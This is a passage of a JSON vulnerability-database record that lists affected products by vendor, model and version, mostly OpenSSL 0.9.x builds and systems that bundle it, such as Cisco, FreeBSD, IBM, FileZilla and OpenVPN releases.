            "model": "hardware management console for pseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "stonebeat fullcluster for gauntlet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "networks meridian option 51c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.6.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "server 0.8.6a",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "aironet acs350 c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3502.6"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.3"
          },
          {
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "model": "hardware management console for iseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "call manager sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.2.0.1"
          },
          {
            "model": "call manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.0.201"
          },
          {
            "model": "hardware management console for iseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "call manager es07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "model": "hardware management console for pseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.2"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "7.0"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(0)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "model": "ons ios-based blades",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15454"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.5"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.7"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76550"
          },
          {
            "model": "hardware management console for iseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.2"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.5.0"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.17"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.3"
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.5"
          },
          {
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.1"
          },
          {
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "model": "hardware management console for pseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.4"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "intuity lx",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "linux personal oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.4"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.x"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0(2)"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.1"
          },
          {
            "model": "access registrar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "networks meridian option 81c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.2"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "model": "linux openexchange server",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7.1"
          },
          {
            "model": "hardware management console for iseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.4"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "server 0.9.4d",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.42"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "grid engine update7 1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5.2"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "call manager es40",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.19"
          },
          {
            "model": "call manager es50",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.2"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.6"
          },
          {
            "model": "secure acs for windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ids",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3(5)"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.659"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.1"
          },
          {
            "model": "networks communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.4"
          },
          {
            "model": "converged communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.22"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.2"
          },
          {
            "model": "hardware management console for iseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "grid engine update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "model": "s8500 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.50.3.45"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.4"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "model": "s8700 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.2"
          },
          {
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "call manager es56",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.0"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.3"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0x86"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.11"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40003.1.59.24"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "model": "hardware management console for iseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.5"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0"
          },
          {
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "hat network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3)4.2"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.1"
          },
          {
            "model": "predictive dialer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ftp server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.3.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.2"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.0"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "20003.1.59.24"
          },
          {
            "model": "-release-p20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "grid engine update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
